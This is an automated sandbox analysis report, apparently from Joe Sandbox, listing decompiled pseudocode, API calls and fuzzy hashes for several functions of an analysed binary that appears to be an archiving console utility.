                                                                                                                    0x00b3134f
                                                                                                                    0x00b31351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31368
                                                                                                                    0x00b31368
                                                                                                                    0x00b3136a
                                                                                                                    0x00b3136d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3136f
                                                                                                                    0x00b31373
                                                                                                                    0x00b313a8
                                                                                                                    0x00b313ad
                                                                                                                    0x00b313b1
                                                                                                                    0x00b313b5
                                                                                                                    0x00b313c7
                                                                                                                    0x00b313ca
                                                                                                                    0x00b313cf
                                                                                                                    0x00b313d2
                                                                                                                    0x00b313d9
                                                                                                                    0x00b313de
                                                                                                                    0x00b313e5
                                                                                                                    0x00b313eb
                                                                                                                    0x00000000
                                                                                                                    0x00b313eb
                                                                                                                    0x00b313bc
                                                                                                                    0x00b313c1
                                                                                                                    0x00b313c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b313c5
                                                                                                                    0x00b3138f
                                                                                                                    0x00b31391
                                                                                                                    0x00b31393
                                                                                                                    0x00b316e5
                                                                                                                    0x00b316eb
                                                                                                                    0x00b316f1
                                                                                                                    0x00b316f8
                                                                                                                    0x00b31703
                                                                                                                    0x00b3170f
                                                                                                                    0x00b31715
                                                                                                                    0x00b31719
                                                                                                                    0x00000000
                                                                                                                    0x00b31719
                                                                                                                    0x00000000
                                                                                                                    0x00b31399
                                                                                                                    0x00b3133c
                                                                                                                    0x00b312ed
                                                                                                                    0x00b312ed
                                                                                                                    0x00b312f0
                                                                                                                    0x00b312f4
                                                                                                                    0x00b312f8
                                                                                                                    0x00b312fe
                                                                                                                    0x00b3130a
                                                                                                                    0x00b3130d
                                                                                                                    0x00b3130d
                                                                                                                    0x00000000
                                                                                                                    0x00b312f8
                                                                                                                    0x00b312a6
                                                                                                                    0x00b312ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b312ae
                                                                                                                    0x00000000
                                                                                                                    0x00b312ae
                                                                                                                    0x00b311ba
                                                                                                                    0x00b311c1
                                                                                                                    0x00b311c7
                                                                                                                    0x00b311cd
                                                                                                                    0x00000000
                                                                                                                    0x00b315e4
                                                                                                                    0x00b315e4
                                                                                                                    0x00b315ea
                                                                                                                    0x00b315ea
                                                                                                                    0x00b315f3
                                                                                                                    0x00b315f3
                                                                                                                    0x00000000
                                                                                                                    0x00b31130
                                                                                                                    0x00b31133
                                                                                                                    0x00b3113c
                                                                                                                    0x00b31141
                                                                                                                    0x00b31144
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31148
                                                                                                                    0x00b3114c
                                                                                                                    0x00b31151
                                                                                                                    0x00b31151
                                                                                                                    0x00b31154
                                                                                                                    0x00b3184c
                                                                                                                    0x00b31857
                                                                                                                    0x00b3185d
                                                                                                                    0x00000000
                                                                                                                    0x00b3185f
                                                                                                                    0x00b30f18
                                                                                                                    0x00b30f18
                                                                                                                    0x00b30f1e
                                                                                                                    0x00b30f26
                                                                                                                    0x00b30f2b
                                                                                                                    0x00b30f2e
                                                                                                                    0x00b30f32
                                                                                                                    0x00b30f38
                                                                                                                    0x00b30f3e
                                                                                                                    0x00b30f42
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b30f52
                                                                                                                    0x00b30f62
                                                                                                                    0x00b30f66
                                                                                                                    0x00b30f6d
                                                                                                                    0x00b31050
                                                                                                                    0x00b31052
                                                                                                                    0x00b31055
                                                                                                                    0x00b31058
                                                                                                                    0x00b3105d
                                                                                                                    0x00b31071
                                                                                                                    0x00b31089
                                                                                                                    0x00b31091
                                                                                                                    0x00b31860
                                                                                                                    0x00b31866
                                                                                                                    0x00b3186e
                                                                                                                    0x00b3186e
                                                                                                                    0x00b30f76
                                                                                                                    0x00b30f7b
                                                                                                                    0x00b31060
                                                                                                                    0x00b31063
                                                                                                                    0x00b31068
                                                                                                                    0x00b3106b
                                                                                                                    0x00b31070
                                                                                                                    0x00000000
                                                                                                                    0x00b30f81
                                                                                                                    0x00b30f84
                                                                                                                    0x00b30f88
                                                                                                                    0x00b30f8d
                                                                                                                    0x00b30f8e
                                                                                                                    0x00b30f9d
                                                                                                                    0x00b30fa3
                                                                                                                    0x00b30fa8
                                                                                                                    0x00b30fae
                                                                                                                    0x00b30fb7
                                                                                                                    0x00b30fbd
                                                                                                                    0x00b30fc7
                                                                                                                    0x00b30fd3
                                                                                                                    0x00b30fd6
                                                                                                                    0x00b30fda
                                                                                                                    0x00b30fdf
                                                                                                                    0x00b30fe3
                                                                                                                    0x00b30fe6
                                                                                                                    0x00000000
                                                                                                                    0x00b30f18

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B30E9A
                                                                                                                      • Part of subcall function 00B1729C: GetLastError.KERNEL32(00B1B903), ref: 00B1729C
                                                                                                                      • Part of subcall function 00B31A6B: __EH_prolog.LIBCMT ref: 00B31A70
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ErrorLastfree
                                                                                                                    • String ID: Cannot find archive file$The item is a directory
                                                                                                                    • API String ID: 683690243-1569138187
                                                                                                                    • Opcode ID: 06cf458e1c3807c9ae893f1ed608b8ef0bbae055bf97e714190958b185a3af0f
                                                                                                                    • Instruction ID: 8eeff68edb83ee8c14521396b7ef01b71c64293f2aebd89b874b68f8b49b625f
                                                                                                                    • Opcode Fuzzy Hash: 06cf458e1c3807c9ae893f1ed608b8ef0bbae055bf97e714190958b185a3af0f
                                                                                                                    • Instruction Fuzzy Hash: 68722575D00258DFCB25DFA8C880BDDBBF9AF49304F2484DAE849A7252DB709A85CF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4B752 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4B752(intOrPtr* __ecx) {
				signed int _v5;
				unsigned int _v12;
				long _v16;
				unsigned int _v20;
				char _v52;
				void* __edi;
				intOrPtr _t86;
				intOrPtr _t87;
				unsigned int _t104;
				signed char* _t105;
				unsigned int _t107;
				char** _t134;
				char* _t174;
				intOrPtr* _t175;
				intOrPtr* _t177;
				signed char _t202;

				_t177 = __ecx;
				_t174 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
					_v16 = GetTickCount();
				}
				_v5 = _v5 & 0x00000000;
				if( *((intOrPtr*)(_t177 + 0x48)) == _t174) {
					L14:
					_t134 = _t177 + 0x38;
					_t134[1] = _t174;
					 *( *(_t177 + 0x38)) =  *( *(_t177 + 0x38)) & 0x00000000;
					L00B4B6AB(_t177);
					if(_v5 == 0) {
						L16:
						E00B127B7(_t177 + 0x98, _t134);
						_t84 =  *(_t177 + 0x10);
						_t169 =  *(_t177 + 0x14);
						if(( *(_t177 + 0x10) |  *(_t177 + 0x14)) != 0) {
							L00B11944( &_v52, _t84, _t169);
							E00B12869();
							E00B12895(_t134,  &_v52);
						}
						_t193 =  *((intOrPtr*)(_t177 + 0x1c)) - _t174;
						if( *((intOrPtr*)(_t177 + 0x1c)) != _t174) {
							E00B12869();
							E00B128EE(_t134, _t193, _t177 + 0x18);
						}
						if( *((intOrPtr*)(_t177 + 0x28)) != _t174 &&  *((intOrPtr*)(_t177 + 0x3c)) <  *((intOrPtr*)(_t177 + 0xac))) {
							E00B12869();
							_t176 = _t177 + 0x5c;
							L00B12F78(_t177 + 0x5c, _t177 + 0x24);
							E00B120E3( *(_t177 + 0xa4), _t177 + 0x5c);
							E00B1207C( *(_t177 + 0xa4), _t177 + 0x5c, _t177 + 0x50);
							if( *(_t177 + 0x54) +  *((intOrPtr*)(_t177 + 0x3c)) >  *((intOrPtr*)(_t177 + 0xac))) {
								_t104 =  *((intOrPtr*)(_t177 + 0x28));
								_v12 = _t104;
								if(_t104 == 0) {
									L29:
									_t105 =  *(_t177 + 0x50);
									 *(_t177 + 0x54) =  *(_t177 + 0x54) & 0x00000000;
									 *_t105 =  *_t105 & 0x00000000;
									_t202 =  *_t105;
								} else {
									do {
										_t107 = _v12 >> 3;
										if(_t107 == 0) {
											_t107 = 1;
										}
										_v12 = _v12 - _t107;
										L00B12F78(_t176, _t177 + 0x24);
										_v20 = _v12 >> 1;
										L00B13525(_t176, _v12 >> 1,  *((intOrPtr*)(_t177 + 0x60)) - _v12);
										L00B1338E(_t176, _v20, L" . ");
										E00B120E3( *(_t177 + 0xa4), _t176);
										E00B1207C( *(_t177 + 0xa4), _t176, _t177 + 0x50);
									} while ( *(_t177 + 0x54) +  *((intOrPtr*)(_t177 + 0x3c)) >  *((intOrPtr*)(_t177 + 0xac)) && _v12 != 0);
									if(_v12 == 0) {
										goto L29;
									}
								}
							}
							E00B128EE(_t134, _t202, _t177 + 0x50);
							_t174 = 0;
						}
						if(L00B4B9B5(_t177 + 0x44, _t134) != 0) {
							E00B4B618(_t177, _t174, _t174); // executed
							_t175 = _t177 + 0xa4;
							fputs( *_t134,  *( *(_t177 + 0xa4))); // executed
							if( *((char*)(_t177 + 0xa8)) != 0) {
								L00B11FDA( *_t175);
							}
							E00B127B7(_t177 + 0x44, _t134);
							_t174 = 0;
						}
						_t86 = L00B4B9D3(_t177 + 0x68, _t177);
						if( *((intOrPtr*)(_t177 + 0x30)) != _t174) {
							_t87 = _v16;
							 *((intOrPtr*)(_t177 + 0x34)) = _t87;
							return _t87;
						}
					} else {
						_t86 = E00B12A3D(_t134, _t177 + 0x98);
						if(_t86 == 0) {
							goto L16;
						}
					}
				} else {
					_t86 =  *((intOrPtr*)(_t177 + 0x30));
					if(_t86 == _t174 || _v16 -  *((intOrPtr*)(_t177 + 0x34)) >= _t86) {
						if(E00B12A3D(_t177 + 0x80, _t177 + 0x18) == 0 || L00B134CE(_t177 + 0x8c, _t177 + 0x24) == 0 ||  *((intOrPtr*)(_t177 + 0x78)) !=  *(_t177 + 0x10) ||  *((intOrPtr*)(_t177 + 0x7c)) !=  *(_t177 + 0x14)) {
							goto L14;
						} else {
							if( *((intOrPtr*)(_t177 + 0x70)) !=  *((intOrPtr*)(_t177 + 8)) ||  *((intOrPtr*)(_t177 + 0x74)) !=  *((intOrPtr*)(_t177 + 0xc)) ||  *((intOrPtr*)(_t177 + 0x68)) !=  *_t177) {
								L13:
								_v5 = 1;
								goto L14;
							} else {
								_t86 =  *((intOrPtr*)(_t177 + 0x6c));
								if(_t86 !=  *((intOrPtr*)(_t177 + 4))) {
									goto L13;
								}
							}
						}
					}
				}
				return _t86;
			}



















                                                                                                                    0x00b4b75b
                                                                                                                    0x00b4b75d
                                                                                                                    0x00b4b762
                                                                                                                    0x00b4b765
                                                                                                                    0x00b4b76d
                                                                                                                    0x00b4b76d
                                                                                                                    0x00b4b770
                                                                                                                    0x00b4b777
                                                                                                                    0x00b4b7e9
                                                                                                                    0x00b4b7ec
                                                                                                                    0x00b4b7f1
                                                                                                                    0x00b4b7f4
                                                                                                                    0x00b4b7f7
                                                                                                                    0x00b4b800
                                                                                                                    0x00b4b817
                                                                                                                    0x00b4b81e
                                                                                                                    0x00b4b823
                                                                                                                    0x00b4b826
                                                                                                                    0x00b4b82d
                                                                                                                    0x00b4b834
                                                                                                                    0x00b4b83b
                                                                                                                    0x00b4b846
                                                                                                                    0x00b4b846
                                                                                                                    0x00b4b84b
                                                                                                                    0x00b4b84e
                                                                                                                    0x00b4b852
                                                                                                                    0x00b4b85d
                                                                                                                    0x00b4b85d
                                                                                                                    0x00b4b865
                                                                                                                    0x00b4b87c
                                                                                                                    0x00b4b884
                                                                                                                    0x00b4b88a
                                                                                                                    0x00b4b896
                                                                                                                    0x00b4b8a6
                                                                                                                    0x00b4b8b7
                                                                                                                    0x00b4b8bd
                                                                                                                    0x00b4b8c2
                                                                                                                    0x00b4b8c5
                                                                                                                    0x00b4b93c
                                                                                                                    0x00b4b93c
                                                                                                                    0x00b4b93f
                                                                                                                    0x00b4b943
                                                                                                                    0x00b4b943
                                                                                                                    0x00b4b8c7
                                                                                                                    0x00b4b8c7
                                                                                                                    0x00b4b8ca
                                                                                                                    0x00b4b8cd
                                                                                                                    0x00b4b8d1
                                                                                                                    0x00b4b8d1
                                                                                                                    0x00b4b8d2
                                                                                                                    0x00b4b8db
                                                                                                                    0x00b4b8ef
                                                                                                                    0x00b4b8f2
                                                                                                                    0x00b4b901
                                                                                                                    0x00b4b90d
                                                                                                                    0x00b4b91d
                                                                                                                    0x00b4b928
                                                                                                                    0x00b4b93a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4b93a
                                                                                                                    0x00b4b8c5
                                                                                                                    0x00b4b94c
                                                                                                                    0x00b4b951
                                                                                                                    0x00b4b951
                                                                                                                    0x00b4b95f
                                                                                                                    0x00b4b964
                                                                                                                    0x00b4b96f
                                                                                                                    0x00b4b979
                                                                                                                    0x00b4b988
                                                                                                                    0x00b4b98c
                                                                                                                    0x00b4b98c
                                                                                                                    0x00b4b995
                                                                                                                    0x00b4b99a
                                                                                                                    0x00b4b99a
                                                                                                                    0x00b4b9a0
                                                                                                                    0x00b4b9a8
                                                                                                                    0x00b4b9aa
                                                                                                                    0x00b4b9ad
                                                                                                                    0x00000000
                                                                                                                    0x00b4b9ad
                                                                                                                    0x00b4b802
                                                                                                                    0x00b4b80a
                                                                                                                    0x00b4b811
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4b811
                                                                                                                    0x00b4b779
                                                                                                                    0x00b4b779
                                                                                                                    0x00b4b77e
                                                                                                                    0x00b4b79e
                                                                                                                    0x00000000
                                                                                                                    0x00b4b7c2
                                                                                                                    0x00b4b7c8
                                                                                                                    0x00b4b7e5
                                                                                                                    0x00b4b7e5
                                                                                                                    0x00000000
                                                                                                                    0x00b4b7d9
                                                                                                                    0x00b4b7d9
                                                                                                                    0x00b4b7df
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4b7df
                                                                                                                    0x00b4b7c8
                                                                                                                    0x00b4b79e
                                                                                                                    0x00b4b77e
                                                                                                                    0x00b4b9b4

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTickfputs
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 290905099-4150638102
                                                                                                                    • Opcode ID: 79c54e018a2ff51f1ac18bf4df15734f0d6810a3abfd16617b039f1344a928ef
                                                                                                                    • Instruction ID: 31d427984e095bc9351b563cbe8f710e321ba730fbae0732e5c7b1f7b3769276
                                                                                                                    • Opcode Fuzzy Hash: 79c54e018a2ff51f1ac18bf4df15734f0d6810a3abfd16617b039f1344a928ef
                                                                                                                    • Instruction Fuzzy Hash: CB715831600B04AFCB25EB65C581EAAB7F5EF84300F44489DE28797691DB70FE88DB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4F686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B4F686(intOrPtr __edx, void* __eflags) {
				char _v8;
				char _v12;
				void* __ecx;
				intOrPtr _t23;
				char _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t35;
				void* _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr* _t45;
				void* _t52;

				_t39 = __edx;
				_push(_t35);
				_push(_t35);
				_t45 = _t35; // executed
				_t23 = L00B19823(); // executed
				 *_t45 = _t23;
				 *((intOrPtr*)(_t45 + 4)) = _t23;
				 *((intOrPtr*)(_t45 + 0x20)) = 0x40000000;
				 *((intOrPtr*)(_t45 + 0x10)) = 0x40000000;
				 *((intOrPtr*)(_t45 + 0x18)) = 0x40000000;
				 *((char*)(_t45 + 8)) = 0;
				_v12 = 0x40000000;
				_v8 = 0;
				 *((intOrPtr*)(_t45 + 0x24)) = 0;
				 *((intOrPtr*)(_t45 + 0x14)) = 0;
				 *((intOrPtr*)(_t45 + 0x1c)) = 0;
				_t25 = E00B19852( &_v12); // executed
				 *((char*)(_t45 + 9)) = _t25;
				if(_t25 != 0) {
					_t26 = _v12;
					_t42 = _v8;
					 *((intOrPtr*)(_t45 + 0x20)) = _t26;
					 *((intOrPtr*)(_t45 + 0x24)) = _t42;
					if(_t42 > 0 || _t26 > 0x70000000) {
						_v12 = 0x70000000;
						_t42 = 0;
						_t26 = 0x70000000;
					}
					_t52 = _t42 - 0x3333333;
					if(_t52 > 0 || _t52 >= 0 && _t26 > 0x33333333) {
						_t28 = L00B7F440(L00B7F310(_t26, _t42, 0x64, 0), _t39, 0x50, 0);
					} else {
						_t28 = L00B7F310(L00B7F440(_t26, _t42, 0x50, 0), _t39, 0x64, 0);
					}
					 *((intOrPtr*)(_t45 + 0x10)) = _t28;
					 *((intOrPtr*)(_t45 + 0x14)) = _t39;
					_t38 = 5;
					_t40 = _t42;
					_t25 = L00B7F440(L00B7F400(_v12, _t38, _t40), _t40, 0x11, 0);
					 *((intOrPtr*)(_t45 + 0x18)) = _t25;
					 *((intOrPtr*)(_t45 + 0x1c)) = _t40;
				}
				return _t25;
			}

















                                                                                                                    0x00b4f686
                                                                                                                    0x00b4f689
                                                                                                                    0x00b4f68a
                                                                                                                    0x00b4f68d
                                                                                                                    0x00b4f68f
                                                                                                                    0x00b4f694
                                                                                                                    0x00b4f696
                                                                                                                    0x00b4f6a0
                                                                                                                    0x00b4f6a3
                                                                                                                    0x00b4f6a6
                                                                                                                    0x00b4f6ac
                                                                                                                    0x00b4f6af
                                                                                                                    0x00b4f6b2
                                                                                                                    0x00b4f6b5
                                                                                                                    0x00b4f6b8
                                                                                                                    0x00b4f6bb
                                                                                                                    0x00b4f6be
                                                                                                                    0x00b4f6c5
                                                                                                                    0x00b4f6c8
                                                                                                                    0x00b4f6ce
                                                                                                                    0x00b4f6d2
                                                                                                                    0x00b4f6d5
                                                                                                                    0x00b4f6da
                                                                                                                    0x00b4f6e2
                                                                                                                    0x00b4f6e8
                                                                                                                    0x00b4f6eb
                                                                                                                    0x00b4f6ed
                                                                                                                    0x00b4f6ed
                                                                                                                    0x00b4f6ef
                                                                                                                    0x00b4f6f5
                                                                                                                    0x00b4f725
                                                                                                                    0x00b4f700
                                                                                                                    0x00b4f70f
                                                                                                                    0x00b4f70f
                                                                                                                    0x00b4f72a
                                                                                                                    0x00b4f732
                                                                                                                    0x00b4f735
                                                                                                                    0x00b4f736
                                                                                                                    0x00b4f742
                                                                                                                    0x00b4f747
                                                                                                                    0x00b4f74a
                                                                                                                    0x00b4f74d
                                                                                                                    0x00b4f751

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B19852: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00B19876
                                                                                                                      • Part of subcall function 00B19852: GetProcAddress.KERNEL32(00000000), ref: 00B1987D
                                                                                                                      • Part of subcall function 00B19852: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00B1988B
                                                                                                                    • __aulldiv.LIBCMT ref: 00B4F70F
                                                                                                                    • __aulldiv.LIBCMT ref: 00B4F71B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                    • String ID: 3333
                                                                                                                    • API String ID: 3520896023-2924271548
                                                                                                                    • Opcode ID: 60b01b0ef032251a32f3952797061ff945020e8e91714d197adc220a7d2c41df
                                                                                                                    • Instruction ID: 543ee836273610cba0fbfd45b06ec60ad7012f2252ea9280b40cdfc886476a97
                                                                                                                    • Opcode Fuzzy Hash: 60b01b0ef032251a32f3952797061ff945020e8e91714d197adc220a7d2c41df
                                                                                                                    • Instruction Fuzzy Hash: F921B5B19007056FE7309F798881A7BBAF9EB44714F10897EB04AD3341D670AD448B69
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B172B9 Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B172B9(void** __ecx, void* __eflags) {
				signed int _t28;
				intOrPtr _t29;
				signed int _t31;
				void* _t35;
				void** _t50;
				void* _t52;

				L00B7F140(0xb82fb4, _t52);
				_t50 = __ecx;
				_t28 = E00B1736B(__ecx);
				if(_t28 != 0) {
					 *((char*)(__ecx + 5)) = 0;
					_t29 = E00B18760( *(_t52 + 8));
					 *((intOrPtr*)(_t52 - 0x10)) = _t29;
					if(_t29 != 1) {
						_t35 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *(_t52 + 0x14),  *(_t52 + 0x18), 0); // executed
						 *_t50 = _t35;
					}
					if( *_t50 == 0xffffffff &&  *((intOrPtr*)(_t52 - 0x10)) != 0) {
						_t31 = E00B12D90(_t52 - 0x1c);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						if(E00B18869( *(_t52 + 8), _t52 - 0x1c, _t52, _t31 & 0xffffff00 |  *((intOrPtr*)(_t52 - 0x10)) != 0x00000001) != 0) {
							 *_t50 = CreateFileW( *(_t52 - 0x1c),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *(_t52 + 0x14),  *(_t52 + 0x18), 0);
						}
						E00B11E89(_t33,  *(_t52 - 0x1c));
					}
					_t28 = 0 |  *_t50 != 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t28;
			}









                                                                                                                    0x00b172be
                                                                                                                    0x00b172c7
                                                                                                                    0x00b172c9
                                                                                                                    0x00b172d0
                                                                                                                    0x00b172dd
                                                                                                                    0x00b172e0
                                                                                                                    0x00b172ee
                                                                                                                    0x00b172f1
                                                                                                                    0x00b17304
                                                                                                                    0x00b17306
                                                                                                                    0x00b17306
                                                                                                                    0x00b1730b
                                                                                                                    0x00b17315
                                                                                                                    0x00b17324
                                                                                                                    0x00b17332
                                                                                                                    0x00b17347
                                                                                                                    0x00b17347
                                                                                                                    0x00b1734c
                                                                                                                    0x00b17351
                                                                                                                    0x00b17359
                                                                                                                    0x00b17359
                                                                                                                    0x00b17360
                                                                                                                    0x00b17368

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B172BE
                                                                                                                      • Part of subcall function 00B1736B: FindCloseChangeNotification.KERNELBASE(00000000,?,00B172CE,00000002,?,00000000,00000000), ref: 00B17376
                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 00B17304
                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00B17345
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile$ChangeCloseFindH_prologNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3273702577-0
                                                                                                                    • Opcode ID: 1c34b61fd8868e24e75beb137ee5e6d757a7d063ee256422d25a6ae0de82a7e5
                                                                                                                    • Instruction ID: 0b7e67d471b95d41db4003e432f8489b8559ff2431fc03bd020a5ae7589c832e
                                                                                                                    • Opcode Fuzzy Hash: 1c34b61fd8868e24e75beb137ee5e6d757a7d063ee256422d25a6ae0de82a7e5
                                                                                                                    • Instruction Fuzzy Hash: 7B11B47280020AEFCF11AFA4DC408EEBBBAFF44354B548569F971531A0CB319DA1EB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B471EE Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00B471EE(struct _IO_FILE** __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t15;
				void* _t20;
				struct _IO_FILE** _t54;
				void* _t56;

				L00B7F140(E00B86130, _t56);
				_t54 = __ecx;
				E00B12DD3(_t56 - 0x18, __edx);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t15 = E00B12296( *((intOrPtr*)(_t56 - 0x18)), 0xa);
				_t62 = _t15;
				if(_t15 < 0) {
					E00B120E3(__ecx, _t56 - 0x18);
					_push( *((intOrPtr*)(_t56 - 0x18)));
					L00B11FFC(__ecx, __eflags); // executed
				} else {
					E00B11FE9(__ecx);
					fputs("{",  *__ecx);
					E00B11FE9(_t54);
					L00B4729F(_t56 - 0x18);
					E00B120AE(_t54, _t56 - 0x18);
					_push( *((intOrPtr*)(_t56 - 0x18)));
					L00B11FFC(_t54, _t62);
					E00B11FE9(_t54);
					fputs("}",  *_t54);
				}
				_t20 = E00B11E89(E00B11FE9(_t54),  *((intOrPtr*)(_t56 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t20;
			}







                                                                                                                    0x00b471f3
                                                                                                                    0x00b471fc
                                                                                                                    0x00b47202
                                                                                                                    0x00b4720a
                                                                                                                    0x00b47212
                                                                                                                    0x00b47217
                                                                                                                    0x00b47219
                                                                                                                    0x00b47273
                                                                                                                    0x00b4727a
                                                                                                                    0x00b4727d
                                                                                                                    0x00b4721b
                                                                                                                    0x00b4721e
                                                                                                                    0x00b47230
                                                                                                                    0x00b47236
                                                                                                                    0x00b4723e
                                                                                                                    0x00b47249
                                                                                                                    0x00b47250
                                                                                                                    0x00b47253
                                                                                                                    0x00b4725a
                                                                                                                    0x00b47266
                                                                                                                    0x00b4726a
                                                                                                                    0x00b4728c
                                                                                                                    0x00b47296
                                                                                                                    0x00b4729e

                                                                                                                    APIs
                                                                                                                    • fputs.MSVCRT ref: 00B47266
                                                                                                                    • fputs.MSVCRT ref: 00B47230
                                                                                                                      • Part of subcall function 00B11FFC: __EH_prolog.LIBCMT ref: 00B12001
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B471F3
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
